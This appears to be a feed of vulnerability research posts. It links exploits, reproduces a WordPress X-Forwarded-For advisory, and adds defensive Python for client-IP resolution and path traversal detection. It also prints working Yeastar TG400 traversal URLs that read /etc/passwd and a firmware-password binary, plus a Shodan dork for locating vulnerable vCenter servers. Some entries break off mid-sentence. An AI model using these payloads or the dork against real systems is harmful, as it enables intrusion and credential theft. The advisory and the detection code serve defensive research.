Recent Vulmon Research Posts

Exploit for CVE-2020-16040, a Google Chrome <= 87.0.4280.88 vulnerability: https://github.com/r4j0x00/exploits/tree/master/CVE-2020-16040

CVE-2019-8761 is an interesting macOS bug that lets attackers execute HTML within a TXT file, leak files, and do all sorts of other funky things https://www.paulosyibelo.com/2021/04/this-man-thought-opening-txt-file-is.html

Zoom Unintended Screen Sharing Vulnerability POC:

This looks like a false positive, because:
* obtaining the MS AJAX framework script is not a security vulnerability - it is a publicly available script that can also be served from the standard webresource handler
* the presence of code that contains the `true` keyword (which is a reserved word in JavaScript as well) does not prove a command was executed on the server
* the Telerik WebResource handler is supposed to combine scripts based on server settings, and the fact that requesting the handler returns Telerik code is not a vulnerability by itself - this is also code that is publicly available (for example, from the Telerik CDN) and it is JavaScript code that is not generated based on

I. VULNERABILITY
-------------------------
Data Manipulation with X-Forwarded-For header at WordPress

II. CVE REFERENCE
-------------------------
CVE-2020-35539

III. VENDOR
-------------------------
https://wordpress.org

IV. TIMELINE
-------------------------
20/12/2020 Vulnerability discovered
21/12/2020 Vendor contacted
09/03/2021 CVE Assigned

V. CREDIT
-------------------------
Alphan Yavas

VI. DESCRIPTION
-------------------------
"X-Forwarded-For" is an HTTP header used to carry the client's original IP address. However, because these headers may very well be added by the client to the requests, if the systems/devices use IP addresses which decelerate at X
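The advisory's point is that X-Forwarded-For is written by whoever sends the request, so any IP-based decision that reads it blindly can be steered by the client. The following added example is not part of the advisory or of WordPress; it assumes a WSGI-style `environ` dict, a hypothetical trusted-proxy range and a hypothetical admin allowlist, and contrasts a naive reader of the header with one that only honours hops added by proxies you control.

```python
"""Added example (not from the advisory): reading X-Forwarded-For safely.

Assumptions (this example's own, not the vendor's):
  * requests arrive as WSGI-style environ dicts (REMOTE_ADDR, HTTP_X_FORWARDED_FOR)
  * reverse proxies live in TRUSTED_PROXIES; nothing else may add XFF hops
  * ADMIN_IPS is an allowlist that a naive implementation checks against XFF
"""
import ipaddress

TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]   # assumed proxy tier
ADMIN_IPS = {"127.0.0.1"}                                 # assumed allowlist


def _is_valid_ip(value):
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def _is_trusted_proxy(value):
    if not _is_valid_ip(value):
        return False
    ip = ipaddress.ip_address(value)
    return any(ip in net for net in TRUSTED_PROXIES)


def naive_client_ip(environ):
    """Vulnerable pattern: the leftmost XFF entry is taken as the client.

    The leftmost entry is exactly the one the client writes itself, so a
    direct connection with a forged header impersonates any address."""
    xff = environ.get("HTTP_X_FORWARDED_FOR", "")
    if xff.strip():
        return xff.split(",")[0].strip()
    return environ["REMOTE_ADDR"]


def client_ip(environ):
    """Hardened: only believe XFF when the socket peer is a trusted proxy,
    then walk the header right to left and stop at the first hop that is
    not one of our proxies. Everything left of that hop is attacker-controlled."""
    remote = environ["REMOTE_ADDR"]
    if not _is_trusted_proxy(remote):
        return remote                       # direct client: header is noise
    hops = [h.strip() for h in environ.get("HTTP_X_FORWARDED_FOR", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if not _is_valid_ip(hop):
            return remote                   # malformed chain: fall back to the peer
        if not _is_trusted_proxy(hop):
            return hop
    return remote                           # every hop was ours; treat the proxy as client


def is_admin_request(environ, resolver):
    """IP allowlist check parameterised by the resolver, to show the difference."""
    return resolver(environ) in ADMIN_IPS


if __name__ == "__main__":
    # Constructed request: attacker at 203.0.113.7 connects directly and forges XFF.
    forged = {"REMOTE_ADDR": "203.0.113.7", "HTTP_X_FORWARDED_FOR": "127.0.0.1"}
    print("naive  :", is_admin_request(forged, naive_client_ip))   # True  (bypass)
    print("hardened:", is_admin_request(forged, client_ip))        # False
```

Run it and the naive resolver grants admin to the forged request while the hardened one does not; the same logic applies to rate limiting, geo-blocking or audit logs that key on the header.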

CVE-2021-21327, recently found in GLPI by Iterasec, allows remote instantiation of PHP objects. Technical writeup and exploit included for research purposes: https://iterasec.com/cve-2021-21327-unsafe-reflection-in-getitemforitemtype-in-glpi/

Shodan dork of CVE-2021-21972 VMware vCenter Server vSphere Client Remote Code Execution: https://www.shodan.io/search?query=http.title:%22ID_VC_Welcome%22

VMware vCenter Server vSphere Client remote code execution: attackers can gain root privilege by exploiting CVE-2021-21972. This is an easy-to-exploit vulnerability, so further exploitation is likely. The vulnerability also exists in all default installations. Apply workarounds urgently: https://kb.vmware.com/s/article/82374

Path Traversal on Yeastar TG400 GSM Gateway - 91.3.0.3
To get the firmware decrypting password: http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect
To get /etc/passwd: http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd
https://github.com/SQSamir/CVE-2021-27328
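The two URLs above are plain `../` traversal through a CGI parameter. As an added example, not taken from the Yeastar firmware or the linked repository, the block below shows how to decide whether a parameter value escapes the directory a handler is meant to serve from, and runs that check over a few constructed access-log lines in the shape of the requests above. The base directory `/srv/www`, the log lines and the function names are this example's own assumptions; the real handler's document root is not known from the page.

```python
"""Added example (not vendor code): detecting path traversal in CGI parameters.

Assumptions (this example's own):
  * the handler is meant to serve files beneath BASE_DIR (hypothetical)
  * requests are logged in Apache combined format (constructed sample below)
"""
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

BASE_DIR = "/srv/www"   # assumed document root of the CGI handler

# Constructed sample log; the request lines mirror the Yeastar payload shape.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Mar/2021:10:00:00 +0000] "GET /cgi/WebCGI?1404=../../../../../../../../../../etc/passwd HTTP/1.1" 200 1247
192.0.2.11 - - [01/Mar/2021:10:00:01 +0000] "GET /cgi/WebCGI?1404=index.html HTTP/1.1" 200 512
192.0.2.12 - - [01/Mar/2021:10:00:02 +0000] "GET /cgi/WebCGI?1404=..%2F..%2Fbin%2Ffirmware_detect HTTP/1.1" 200 2048
192.0.2.13 - - [01/Mar/2021:10:00:03 +0000] "GET /cgi/WebCGI?1404=css%2Fmain.css HTTP/1.1" 200 900
"""

_REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def fully_decode(value, max_rounds=3):
    """Undo percent-encoding until the value stops changing (catches %252e%252e)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def escapes_base(base, user_path):
    """True when base joined with user_path normalises to a location outside base.

    An absolute user_path also counts as an escape, because posixpath.join
    discards the base in that case, which is exactly the behaviour an
    unguarded C/CGI handler would have."""
    base = posixpath.normpath("/" + base.strip("/"))
    target = posixpath.normpath(posixpath.join(base, fully_decode(user_path)))
    return not (target == base or target.startswith(base + "/"))


def flag_requests(log_text, base=BASE_DIR):
    """Return one dict per request whose query parameter would escape base."""
    hits = []
    for line in log_text.splitlines():
        m = _REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if escapes_base(base, value):
                hits.append({"ip": line.split(" ", 1)[0], "param": name, "path": fully_decode(value)})
    return hits


if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LOG):
        print(f"{hit['ip']} traversal via {hit['param']} -> {hit['path']}")
```

The same `escapes_base` check, run on the server side before opening a file, is the fix for this class of bug: resolve the joined path, then refuse anything that does not stay under the intended root. The log scan is a heuristic for hunting; it will not see traversal hidden in POST bodies or headers that the access log does not record.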